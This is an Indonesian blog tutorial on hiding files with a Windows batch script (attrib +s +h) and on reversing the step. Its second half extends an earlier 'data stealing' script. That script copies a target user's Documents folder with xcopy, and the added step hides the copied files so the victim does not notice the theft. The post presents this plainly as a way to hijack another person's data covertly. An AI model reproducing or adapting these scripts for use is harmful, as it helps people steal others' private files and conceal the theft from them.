Sunday, December 6, 2015

Cara hidden file dengan ampuh menggunakan notepad

Hidden file dengan ampuh menggunakan notepad

Sebelumya kita sudah membahas artikel tentang Mencuri data dengan hanya mengetahui nama komputer dan users target. nah, pada kesempatan kali ini saya akan memberikan anda sebuah trik untuk menyembunyikan atau hidden file dengan ampuh supaya orang lain tidak mengetahui kita menyembunyikan file dalam komputer kita maupun komputer orang lain.


Trik ini sangat mudah sekali untuk anda lakukan dirumah untuk menyembunyikan file-file rahasia anda yang mungkin anda niatkan untuk sebaiknya tidak diketahui oleh orang lain. Untuk melakukan trik ini bacalah artikelnya di bawah:

Tahap persiapan
Hal pertama yang harus anda lakukan adalah membuka Notepad untuk menuliskan script dibawah ini

@echo off
attrib /s /d +s +h
pause



Setelah anda selesai mengetikkan script diatas anda harus menyimpannya terlebih dahulu. Seperti biasa dalam kotak dialog save as pastikan anda pilih All files dan menyimpannya dengan nama hilang.bat.

Menjalankan trik
Untuk melakukan trik ini anda harus menempatkan file script tersebut kedalam folder yang ingin anda sembunyikan keberadaannya.

Setelah itu anda tinggal menjalankan hilang.bat tersebut, maka secara otomatis akan muncul Cmd sebagai tanda bahwa File akan segera ter hidden dan folder akan langsung kosong (Hidden).


Catatan:

Setelah file dalam folder tersebut kosong, artinya trik anda berjalan dengan sukses, ketika anda berniat untuk mengembalikan seperti semula, itu tidak semudah yang anda lakukan seperti mengembalikan file terhidden dengan biasanya. Melainkan anda harus mengetikkan script berikut:

@echo off
attrib /s /d -s -h
pause

Anda hanya perlu merubah +s +h (Plus) pada script pertama menjadi -s -h ( Minus).


Seperti biasa dalam kotak dialog save as pastikan anda pilih All Files dan menyimpannya dengan nama muncul.bat.
Setelah anda simpan dan menjalankan muncul.bat. maka file yang sudah anda Hidden tadi akan muncul dengan sendirinya, dan trik anda bisa dikatakan sukses.


Selesai, Trik di atas sudah bisa anda terapkan dirumah untuk menyembunyikan file yang anda rahasiakan.

Seperti yang sudah saya janjikan dalam artikel sebelumnya "Cara mencuri data dengan hanya mengetahui nama komputer dan users target" untuk menyembunyikan data data yang anda bajak secara otomatis.  

Kembali ke data.bat dan datacopy.vbs

Tahap awal yang harus anda lakukan adalah Edit kembali data.bat yang sudah di buat sebelumnya
Sebelum:

@echo off
mkdir %computername%
xcopy "C:\Users\Effendi\Documents\*.*" %ASUS% /s/c/q/r
@cls

Menjadi:

@echo off
mkdir %computername%
xcopy "C:\Users\Effendi\Documents\*.*" %ASUS% /s/c/q/r
@cls
attrib /s /d +s +h
pause

Qexit

(Bold hitam adalah script yang harus anda tambahkan)

Selanjutnya simpan dengan cara dan nama yang sama.
Menjalankan aksi

Sama seperti cara artikel sebelumnya, anda jalankan data.bat untuk membajak data target dan ketika anda menjalankannya, Apa yang terjadi? Perubahan apa yang anda rasakan?

Ketika proses pembajakan data dilakukan, secara otomatis data data tersebut akan langsung terhidden sehingga korban pembajakan kemungkinan besar tidak akan mengetahui kita sedang membajak data-data komputernya.

Itulah ulasan mengenai Cara hidden file dengan ampuh menggunakan notepad.
Agar file-file .bat yang anda buat menjadi sebuah aplikasi baca juga artikel berikutnya 
Cara mengubah File .bat menjadi Exe.
Load disqus comments

0 comments